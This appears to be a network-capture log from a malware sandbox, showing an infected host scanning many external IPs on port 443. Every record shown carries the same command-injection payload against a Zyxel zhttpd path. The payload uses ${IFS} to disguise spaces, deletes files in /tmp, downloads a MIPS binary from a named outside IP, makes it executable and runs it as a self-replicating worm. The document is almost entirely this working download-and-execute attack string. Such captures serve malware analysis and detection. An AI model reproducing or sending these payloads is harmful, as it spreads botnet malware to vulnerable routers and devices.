                                                Jan 12, 2024 18:16:21.404663086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3938192.168.2.2337258205.221.28.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404694080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3939192.168.2.235107499.134.245.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404742002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3940192.168.2.2351706109.95.180.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404802084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3941192.168.2.2351988167.10.206.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404817104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3942192.168.2.235252219.75.135.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404859066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3943192.168.2.2342624168.245.163.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404905081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3944192.168.2.233784887.115.74.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404954910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3945192.168.2.2339304108.200.28.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404975891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3946192.168.2.2360052220.29.233.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405040979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3947192.168.2.2357250205.191.102.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405086040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3948192.168.2.23484988.60.17.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405121088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3949192.168.2.2342922131.123.134.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405145884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3950192.168.2.2341338145.193.126.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405190945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3951192.168.2.233589048.41.164.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405217886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3952192.168.2.2347492206.18.135.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405251980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3953192.168.2.2341250167.64.74.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405281067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3954192.168.2.236001499.116.4.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405338049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3955192.168.2.234006641.102.209.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405363083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3956192.168.2.2338460204.41.126.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405395985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3957192.168.2.234053084.250.176.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405462027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3958192.168.2.233915635.153.141.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405493021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3959192.168.2.2336352165.41.70.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405543089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3960192.168.2.2344076115.145.76.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405577898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3961192.168.2.233358845.123.81.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405612946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3962192.168.2.234749220.188.96.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405646086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3963192.168.2.2339400138.234.253.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405690908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3964192.168.2.2340648159.185.8.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405733109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3965192.168.2.233292053.128.131.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405770063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3966192.168.2.2342330199.249.199.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405796051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3967192.168.2.2359870209.155.69.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405852079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3968192.168.2.2336034171.231.119.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405894041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3969192.168.2.233335265.36.156.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405911922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3970192.168.2.2352192199.77.51.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405946970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3971192.168.2.234712827.155.47.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.405993938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3972192.168.2.235058287.5.158.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406023026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3973192.168.2.2354698181.8.92.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406050920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3974192.168.2.2334036207.116.196.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406083107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3975192.168.2.233443884.96.81.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406119108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3976192.168.2.2354598140.206.5.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406152964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3977192.168.2.2346812114.126.129.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406202078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3978192.168.2.2352888195.6.14.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406244993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3979192.168.2.2358830139.6.155.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406276941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3980192.168.2.2342678200.105.98.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406331062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3981192.168.2.233720460.170.181.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406358957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3982192.168.2.234728659.151.219.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406385899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3983192.168.2.2350584137.139.179.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406454086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3984192.168.2.233821293.141.74.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406485081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3985192.168.2.2334180184.67.97.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406543970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3986192.168.2.2335416211.47.113.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406579018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3987192.168.2.233675695.199.148.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406639099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3988192.168.2.234835294.50.187.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406668901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3989192.168.2.2348670159.207.176.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406696081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3990192.168.2.2337632212.43.237.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406723022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3991192.168.2.2352296146.208.109.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406763077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3992192.168.2.235331031.79.36.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406790018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3993192.168.2.2345996118.153.158.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406816959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3994192.168.2.2341040208.92.148.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406871080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3995192.168.2.2342850111.148.31.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406909943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3996192.168.2.235553690.242.108.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.406944036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3997192.168.2.234833849.143.115.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407001972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3998192.168.2.2359998204.224.180.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407037973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3999192.168.2.235484293.134.154.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407075882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4000192.168.2.2348404219.250.109.233443
                                                TimestampBytes transferredDirectionData
